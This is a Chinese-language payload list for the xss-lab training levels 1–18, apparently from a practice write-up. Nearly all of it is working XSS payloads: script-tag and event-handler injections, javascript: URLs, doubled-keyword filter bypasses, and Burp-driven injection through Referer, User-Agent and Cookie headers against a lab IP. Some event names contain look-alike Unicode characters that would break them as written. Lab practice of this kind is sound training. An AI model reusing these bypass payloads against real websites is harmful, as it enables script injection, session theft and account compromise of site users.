xss-lab 1-18关payload

Less-1

?name=<script>alert()</script>

Less-2

"><script>alert()</script>

"οnclick="alert()

" οnfοcus="alert()

" οnblur="alert()

Less-3

' οnfοcus='alert()

' οnblur='alert()

' οnfοcus='javascript:alert()'

' οnblur='javascript:alert()

' οnclick='alert()

Less-4

" οnfοcus="alert()

" οnfοcus="javascript:alert()

" οnblur="alert()

" οnblur="javascript:alert()

" οnclick="alert()

" οnclick="javascript:alert()

Less-5

"><a href="javascript:alert();">cooper</a>

Less-6

" Onclick="alert()

" Onfocus="alert()

" Onblur = "alert()

"><a Href="javascript:alert()">cooper</a>

"><Script>alert()</Script>

Less-7

" oonnfocus="alert()

"oonnclick="alert()

" oonnfocus="alert()

"><a hhrefref="javasscriptcript:alert()">cooper</a>

"><sscriptcript>alert()</sscriptcript>

"><img ssrcrc=666 oonnerror=alert()>

"><img srsrcc=666 oonnmouseout=alert()>

"><img srsrcc=666 oonnmouseover=alert()>

Less-8

javascript:alert() （使用Unicode编码）

javascript:alert()

Less-9

javascript:alert() 编码后加http://，注释使用//或/**/

javascript:alert()//http://

javascript:alert()/*http://*/

Less-10

?t_sort=" οnfοcus=javascript:alert(); type="text type（加窗口）

?t_sort=" οnclick=javascript:alert(); type="

?t_sort=" οnblur=javascript:alert(); type="

?keyword=well done!&t_lick=aa&t_history=aa&t_sort=aa 查看哪里可以赋值

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnclick='alert(123)'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnblur='javascript:alert()'

?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnfοcus='alert(123)'

Less-11

使用burpsuite抓包

在Referer处改为Less-10的payload，放行即可

Referer:" οnfοcus=javascript:alert(); type="text

Less-12

使用burpsuite抓包

在UA处改为Less-10的payload，放行即可

User-Agent: " οnfοcus=javascript:alert(); type="text

Less-13

使用burpsuite抓包

在cookie处改为Less-10的payload，放行即可

Cookie: user=" οnfοcus=javascript:alert() type="text

Less-14

网页失效，上传图片属性中含有js代码，详见博客

Less-15

http://192.168.31.110/xss/level15.php?src=' http://192.168.31.110/xss/level1.php?name="><a href="javascript:alert( )">cooper</a>'

Less-16

http://192.168.31.110/xss/level16.php?keyword=<a href='javasc ript:alert()'>cooper

Less-17

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b οnmοuseοver=javascript:alert()

http://192.168.31.110/xss/level17.php?arg01=a\&arg02=b οnmοuseοut=javascript:alert()

（在edge上打开，火狐没有弹窗）

Less-18

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseοver=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseοut=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseleave=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοuseenter=alert()

http://192.168.31.110/xss/level18.php?arg01=a\&arg02=b οnmοusedοwn=alert() （点击触发）

onmouseover、onmouseout：鼠标移动到自身时候会触发事件，同时移动到其子元素身上也会触发事件

onmouseenter、onmouseleave：鼠标移动到自身是会触发事件，但是移动到其子元素身上不会触发事件